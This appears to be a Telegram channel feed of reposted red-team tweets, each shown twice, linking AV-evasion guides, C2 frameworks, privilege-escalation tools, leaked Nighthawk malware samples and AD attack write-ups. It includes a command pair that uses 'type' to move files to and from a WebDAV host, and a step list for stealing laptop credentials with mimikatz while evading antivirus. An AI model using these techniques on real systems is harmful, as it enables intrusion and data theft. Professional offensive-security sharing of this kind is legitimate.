😈 [ Mr_0rng, mr.0range ]
The Windows type command has download/upload functionality
1️⃣ Host a WebDAV server with anonymous r/w access
2️⃣ Download: type \\webdav-ip\folder\file.ext > C:\Path\file.ext
3️⃣ Upload: type C:\Path\file.ext > \\webdav-ip\folder\file.ext
#lolbin #redteam
(Bonus ADS 😆)
🐥 [ tweet ]
The Windows type command has download/upload functionality
1️⃣ Host a WebDAV server with anonymous r/w access
2️⃣ Download: type \\webdav-ip\folder\file.ext > C:\Path\file.ext
3️⃣ Upload: type C:\Path\file.ext > \\webdav-ip\folder\file.ext
#lolbin #redteam
(Bonus ADS 😆)
🐥 [ tweet ]
😈 [ netbiosX, netbiosX 🦄 ]
DynamicDotNet - A collection of various and sundry code snippets that leverage .NET dynamic tradecraft by @bohops https://t.co/G7aW8NIUXw #redteam
🔗 https://github.com/bohops/DynamicDotNet
🐥 [ tweet ]
DynamicDotNet - A collection of various and sundry code snippets that leverage .NET dynamic tradecraft by @bohops https://t.co/G7aW8NIUXw #redteam
🔗 https://github.com/bohops/DynamicDotNet
🐥 [ tweet ]
😈 [ m2rc_p, marc ]
My page about AV Evasion for HackTricks just got merged!
Tried to include mostly methodology of modern techniques and also included some practical examples.
· Generic Evasion Methodology
· Dll Sideloading
· AMSI
· SmartScreen & MoTW
· C# Reflection
https://t.co/xYAUtLJRDj
🔗 https://book.hacktricks.xyz/windows-hardening/av-bypass
🐥 [ tweet ]
My page about AV Evasion for HackTricks just got merged!
Tried to include mostly methodology of modern techniques and also included some practical examples.
· Generic Evasion Methodology
· Dll Sideloading
· AMSI
· SmartScreen & MoTW
· C# Reflection
https://t.co/xYAUtLJRDj
🔗 https://book.hacktricks.xyz/windows-hardening/av-bypass
🐥 [ tweet ]
🔥1
Forwarded from Внутрянка
Статья про shadow credentials
Ardent101
Kerberos для специалиста по тестированию на проникновение. Часть 6. PKINIT
В статье рассматривается устройство одного из расширений протокола Kerberos - PKINIT. После теоретической вводной будут разобраны техники проведения атак, связанные с указанным расширением, в частности: Shadow Credentials и UnPAC the hash.
Если вкратце, то…
Если вкратце, то…
🔥5
😈 [ c2_matrix, C2 Matrix | #C2Matrix ]
Thanks to those that have reached out to add C2s to #C2Matrix
- RedditC2 from @kleiton0x7e @t4tch3r_: https://t.co/TIQ7xJyTmb
- RedbloodC2: https://t.co/YK3FuwpFzB
Remember anyone can contribute: https://t.co/sG8nRGxKmg
Golden source is Google Sheet: https://t.co/wy6vaeeKG5
🔗 https://github.com/kleiton0x00/RedditC2
🔗 https://github.com/kira2040k/RedbloodC2
🔗 https://howto.thec2matrix.com/contribute
🔗 https://docs.google.com/spreadsheets/d/1b4mUxa6cDQuTV2BPC6aA-GR4zGZi0ooPYtBe4IgPsSc/edit#gid=0
🐥 [ tweet ]
Thanks to those that have reached out to add C2s to #C2Matrix
- RedditC2 from @kleiton0x7e @t4tch3r_: https://t.co/TIQ7xJyTmb
- RedbloodC2: https://t.co/YK3FuwpFzB
Remember anyone can contribute: https://t.co/sG8nRGxKmg
Golden source is Google Sheet: https://t.co/wy6vaeeKG5
🔗 https://github.com/kleiton0x00/RedditC2
🔗 https://github.com/kira2040k/RedbloodC2
🔗 https://howto.thec2matrix.com/contribute
🔗 https://docs.google.com/spreadsheets/d/1b4mUxa6cDQuTV2BPC6aA-GR4zGZi0ooPYtBe4IgPsSc/edit#gid=0
🐥 [ tweet ]
🔥1
😈 [ r3dy__, Royce Davis ]
Here’s some installation instructions that don’t suck. More to come!
https://t.co/hEOp4NUsTB
🔗 https://realhax.gitbook.io/capsulecorp-pentest/setup/windows
🐥 [ tweet ]
Here’s some installation instructions that don’t suck. More to come!
https://t.co/hEOp4NUsTB
🔗 https://realhax.gitbook.io/capsulecorp-pentest/setup/windows
🐥 [ tweet ]
это лаба для инфры отсюда, ес че https://livebook.manning.com/book/penetrating-enterprise-networks (неплохой generic-материал по внутрякам)😈 [ Flangvik, Melvin langvik ]
Updated SharpCollection! Snaffler @mikeloss , Whisker @elad_shamir and PassTheCert @AlmondOffSec has been added
https://t.co/2l3oQhZLpk
🔗 https://github.com/Flangvik/SharpCollection
🐥 [ tweet ]
Updated SharpCollection! Snaffler @mikeloss , Whisker @elad_shamir and PassTheCert @AlmondOffSec has been added
https://t.co/2l3oQhZLpk
🔗 https://github.com/Flangvik/SharpCollection
🐥 [ tweet ]
😈 [ _nwodtuhs, Charlie Bromberg “Shutdown” ]
Thank you @BlWasp_ for adding Active Directory's SCCM / MECM abuse to https://t.co/L1mByz3R9Z
🔗 https://www.thehacker.recipes/ad/movement/sccm-mecm
🐥 [ tweet ]
Thank you @BlWasp_ for adding Active Directory's SCCM / MECM abuse to https://t.co/L1mByz3R9Z
🔗 https://www.thehacker.recipes/ad/movement/sccm-mecm
🐥 [ tweet ]
This media is not supported in your browser
VIEW IN TELEGRAM
😈 [ chompie1337, chompie ]
Demonstrating CVE-2022-37958 RCE Vuln. Reachable via any Windows application protocol that authenticates. Yes, that means RDP, SMB and many more. Please patch this one, it's serious!
https://t.co/ikOrTvQIJs
🔗 https://securityintelligence.com/posts/critical-remote-code-execution-vulnerability-spnego-extended-negotiation-security-mechanism/
🐥 [ tweet ]
Demonstrating CVE-2022-37958 RCE Vuln. Reachable via any Windows application protocol that authenticates. Yes, that means RDP, SMB and many more. Please patch this one, it's serious!
https://t.co/ikOrTvQIJs
🔗 https://securityintelligence.com/posts/critical-remote-code-execution-vulnerability-spnego-extended-negotiation-security-mechanism/
🐥 [ tweet ]
🔥4
😈 [ pdiscoveryio, ProjectDiscovery.io ]
Automating @pdnuclei with JupiterOne
https://t.co/Y7lbt6HISP
#hackwithautomation
🔗 https://www.jupiterone.com/blog/automating-nuclei-with-jupiterone/
🐥 [ tweet ]
Automating @pdnuclei with JupiterOne
https://t.co/Y7lbt6HISP
#hackwithautomation
🔗 https://www.jupiterone.com/blog/automating-nuclei-with-jupiterone/
🐥 [ tweet ]
😈 [ 424f424f, rvrsh3ll ]
Ok fellow phishers. @Microsoft keeps harassing me via email to correct my blog post. How many of you have had success spoofing with this technique this last year? Time for them to fix this?
https://t.co/TTiUEbZhpI
🔗 https://www.blackhillsinfosec.com/spoofing-microsoft-365-like-its-1995/
🐥 [ tweet ]
Ok fellow phishers. @Microsoft keeps harassing me via email to correct my blog post. How many of you have had success spoofing with this technique this last year? Time for them to fix this?
https://t.co/TTiUEbZhpI
🔗 https://www.blackhillsinfosec.com/spoofing-microsoft-365-like-its-1995/
🐥 [ tweet ]
😈 [ 404death, sailay(valen) ]
I just created the tool which can help to get NT AUTHORITY\SYSTEM from arbitrary directory creation bugs.
https://t.co/Mcv4HH2olT
🔗 https://github.com/binderlabs/DirCreate2System
🐥 [ tweet ]
I just created the tool which can help to get NT AUTHORITY\SYSTEM from arbitrary directory creation bugs.
https://t.co/Mcv4HH2olT
🔗 https://github.com/binderlabs/DirCreate2System
🐥 [ tweet ]
😈 [ _nwodtuhs, Charlie Bromberg “Shutdown” ]
Thank you @BlWasp_ for contributing to The Hacker Tools, documenting Impacket's ping, ping6, GetNPUsers and GetUserSPNs example noscripts
- https://t.co/h3gTvWV4ia
- https://t.co/PRR2wdZkcT
- https://t.co/tApF0oAmBx
- https://t.co/GM1yyW78sF
https://t.co/PjOo8FoZ0p
🔗 https://tools.thehacker.recipes/impacket/examples/ping.py
🔗 https://tools.thehacker.recipes/impacket/examples/ping6.py
🔗 https://tools.thehacker.recipes/impacket/examples/getnpusers.py
🔗 https://tools.thehacker.recipes/impacket/examples/getuserspns.py
🔗 https://tools.thehacker.recipes/impacket/examples
🐥 [ tweet ]
Thank you @BlWasp_ for contributing to The Hacker Tools, documenting Impacket's ping, ping6, GetNPUsers and GetUserSPNs example noscripts
- https://t.co/h3gTvWV4ia
- https://t.co/PRR2wdZkcT
- https://t.co/tApF0oAmBx
- https://t.co/GM1yyW78sF
https://t.co/PjOo8FoZ0p
🔗 https://tools.thehacker.recipes/impacket/examples/ping.py
🔗 https://tools.thehacker.recipes/impacket/examples/ping6.py
🔗 https://tools.thehacker.recipes/impacket/examples/getnpusers.py
🔗 https://tools.thehacker.recipes/impacket/examples/getuserspns.py
🔗 https://tools.thehacker.recipes/impacket/examples
🐥 [ tweet ]
😈 [ NinjaParanoid, Chetan Nayak (Brute Ratel C4 Author) ]
Heres all the nighthawk samples which mdsec tried to hide by blasting VT with fake samples. Enjoy hunting TAs! Sharing for attribution purposes!
https://t.co/Nrlr6CU7TF
https://t.co/7V8r5QObeP
https://t.co/lWNZctPTy8
https://t.co/aIg3QecyTg
https://t.co/ERvg61wELk
🔗 https://anonfiles.com/H1N4XbIby5/f3bba2bfd4ed48b5426e36eba3b7613973226983a784d24d7a20fcf9df0de74e_exe
🔗 https://anonfiles.com/IbN5X4Ify4/b775a8f7629966592cc7727e2081924a7d7cf83edd7447aa60627a2b67d87c94_exe
🔗 https://anonfiles.com/JfN1XcIfy1/9a57919cc5c194e28acd62719487c563a8f0ef1205b65adbe535386e34e418b8_exe
🔗 https://anonfiles.com/K3N4X0Iby5/0551ca07f05c2a8278229c1dc651a2b1273a39914857231b075733753cb2b988_exe
🔗 https://anonfiles.com/E7tdy5J0y4/ea7a1363c5f304c206bc8450ed1d4b14d76eb492a1011b8f2c1d2f218de8c770
🐥 [ tweet ]
Heres all the nighthawk samples which mdsec tried to hide by blasting VT with fake samples. Enjoy hunting TAs! Sharing for attribution purposes!
https://t.co/Nrlr6CU7TF
https://t.co/7V8r5QObeP
https://t.co/lWNZctPTy8
https://t.co/aIg3QecyTg
https://t.co/ERvg61wELk
🔗 https://anonfiles.com/H1N4XbIby5/f3bba2bfd4ed48b5426e36eba3b7613973226983a784d24d7a20fcf9df0de74e_exe
🔗 https://anonfiles.com/IbN5X4Ify4/b775a8f7629966592cc7727e2081924a7d7cf83edd7447aa60627a2b67d87c94_exe
🔗 https://anonfiles.com/JfN1XcIfy1/9a57919cc5c194e28acd62719487c563a8f0ef1205b65adbe535386e34e418b8_exe
🔗 https://anonfiles.com/K3N4X0Iby5/0551ca07f05c2a8278229c1dc651a2b1273a39914857231b075733753cb2b988_exe
🔗 https://anonfiles.com/E7tdy5J0y4/ea7a1363c5f304c206bc8450ed1d4b14d76eb492a1011b8f2c1d2f218de8c770
🐥 [ tweet ]
😈 [ _nwodtuhs, Charlie Bromberg “Shutdown” ]
Updated the DACL abuse mindmap. New dark theme, used BloodHound's iconography, added the ACE inheritance path for Containers and Organizational Unit.
🧑🍳 The Hacker Recipes https://t.co/iMrOGWv63j
🔗 https://www.thehacker.recipes/ad/movement/dacl
🐥 [ tweet ]
Updated the DACL abuse mindmap. New dark theme, used BloodHound's iconography, added the ACE inheritance path for Containers and Organizational Unit.
🧑🍳 The Hacker Recipes https://t.co/iMrOGWv63j
🔗 https://www.thehacker.recipes/ad/movement/dacl
🐥 [ tweet ]
This media is not supported in your browser
VIEW IN TELEGRAM
😈 [ OutflankNL, Outflank ]
New BOF released to our OST customers: Coercer
Coercer triggers a novel and non-public coercion method that forces SMB authentication from the computer account on workstations. From there on, you can for example relay to ADCS for generating a computer certificate.
🐥 [ tweet ]
New BOF released to our OST customers: Coercer
Coercer triggers a novel and non-public coercion method that forces SMB authentication from the computer account on workstations. From there on, you can for example relay to ADCS for generating a computer certificate.
🐥 [ tweet ]
😈 [ _RastaMouse, Rasta Mouse ]
[BLOG]
Short post on alternate ways to impersonate access tokens in C#, including in other threads. Thanks @GuhnooPlusLinux for providing the inspiration.
https://t.co/TRdI5zuR5j
🔗 https://rastamouse.me/token-impersonation-in-csharp/
🐥 [ tweet ]
[BLOG]
Short post on alternate ways to impersonate access tokens in C#, including in other threads. Thanks @GuhnooPlusLinux for providing the inspiration.
https://t.co/TRdI5zuR5j
🔗 https://rastamouse.me/token-impersonation-in-csharp/
🐥 [ tweet ]
😈 [ 0xdf_, 0xdf ]
Support is the 4th box I've released on @hackthebox_eu! It retires today. Light .NET reverseing, LDAP enumeration, and genericall on the DC -> a fake machine AD attack.
Inspiration for the box comes from a @7minsec "tales of pentest pwnage" episode.
https://t.co/79G4EUS7Nt
🔗 https://0xdf.gitlab.io/2022/12/17/htb-support.html
🐥 [ tweet ]
Support is the 4th box I've released on @hackthebox_eu! It retires today. Light .NET reverseing, LDAP enumeration, and genericall on the DC -> a fake machine AD attack.
Inspiration for the box comes from a @7minsec "tales of pentest pwnage" episode.
https://t.co/79G4EUS7Nt
🔗 https://0xdf.gitlab.io/2022/12/17/htb-support.html
🐥 [ tweet ]
🔥3
😈 [ Idov31, Ido Veltzman ]
I'm happy to release Venom - A C++ single header file for evasive network communication which using a stolen browser's socket to perform all of its network activities and by that can make it hard to trace it back to the process.
https://t.co/AVxQbNru3Z
#infosec #CyberSecurity
🔗 https://github.com/Idov31/Venom
🐥 [ tweet ]
I'm happy to release Venom - A C++ single header file for evasive network communication which using a stolen browser's socket to perform all of its network activities and by that can make it hard to trace it back to the process.
https://t.co/AVxQbNru3Z
#infosec #CyberSecurity
🔗 https://github.com/Idov31/Venom
🐥 [ tweet ]
😈 [ an0n_r0, an0n ]
1. remove disk from target laptop
2. virtualize system (VBoxManage convertfromraw)
3. abuse local admin (chntpw using alt booted system)
4. run mimikatz by reflective loading (bypass ESET :) )
5. extract machine cert / secrets
NEVER deploy company laptop without BitLocker.
🐥 [ tweet ]
1. remove disk from target laptop
2. virtualize system (VBoxManage convertfromraw)
3. abuse local admin (chntpw using alt booted system)
4. run mimikatz by reflective loading (bypass ESET :) )
5. extract machine cert / secrets
NEVER deploy company laptop without BitLocker.
🐥 [ tweet ]
😁5🔥2🥱1